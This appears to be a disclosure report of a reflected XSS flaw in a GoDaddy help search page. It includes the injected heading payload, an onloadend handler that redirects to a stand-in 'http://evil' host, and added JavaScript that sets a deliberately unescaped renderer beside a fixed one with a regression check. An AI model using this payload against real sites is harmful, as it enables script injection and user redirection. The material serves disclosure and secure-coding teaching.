XSS vulnerability through the help search results page.
The search query is sent as a GET parameter and is not escaped when it is rendered in the heading of the page, even though it is escaped immediately afterwards. This allows code to be executed directly from a malicious URL.
<h1 class="app-title"><span>Showing results for </span><a href="//uk.godaddy.com/help/search?q=bob" onloadend="document.location=http://evil"><b><i>bob" onloadend="document.location=http://evil</i></b></a></h1>
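The same value needs different handling in the two places it lands in that heading: the link's href attribute and the visible text. The following is an added example, not code from the affected site. The function names, the relative `/help/search` path and the template shape are assumptions modelled on the rendered heading above. It shows the unescaped attribute beside a corrected version, plus a regression check that lists the attributes the anchor ends up with.

```javascript
// Added example; names and template shape are assumptions, not the site's code.

// Escape the characters that are significant in HTML text and in quoted
// attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// "Before": q is escaped for the visible text but concatenated raw into the
// href attribute, so a double quote in q closes the attribute early.
function renderHeadingVulnerable(q) {
  return '<h1 class="app-title"><span>Showing results for </span>' +
    '<a href="/help/search?q=' + q + '"><b><i>' + escapeHtml(q) +
    '</i></b></a></h1>';
}

// "After": percent-encode q for the URL context, then HTML-escape the whole
// attribute value. The text node is HTML-escaped as before.
function renderHeadingFixed(q) {
  const href = '/help/search?q=' + encodeURIComponent(q);
  return '<h1 class="app-title"><span>Showing results for </span>' +
    '<a href="' + escapeHtml(href) + '"><b><i>' + escapeHtml(q) +
    '</i></b></a></h1>';
}

// Regression check: list the attribute names on the <a> tag. Any name other
// than "href" means the query broke out of its attribute.
function anchorAttributeNames(html) {
  const tag = html.match(/<a\s([^>]*)>/)[1];
  return [...tag.matchAll(/([^\s"'=]+)\s*=\s*"[^"]*"/g)].map((m) => m[1]);
}

// Query string taken from the rendered heading in the report.
const reported = 'bob" onloadend="document.location=http://evil';
console.log(anchorAttributeNames(renderHeadingVulnerable(reported)));
console.log(anchorAttributeNames(renderHeadingFixed(reported)));
```

Running the check over every template that reflects `q` catches the case described here, where one output context was escaped and the neighbouring one was missed.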
Reported Fixed Unknown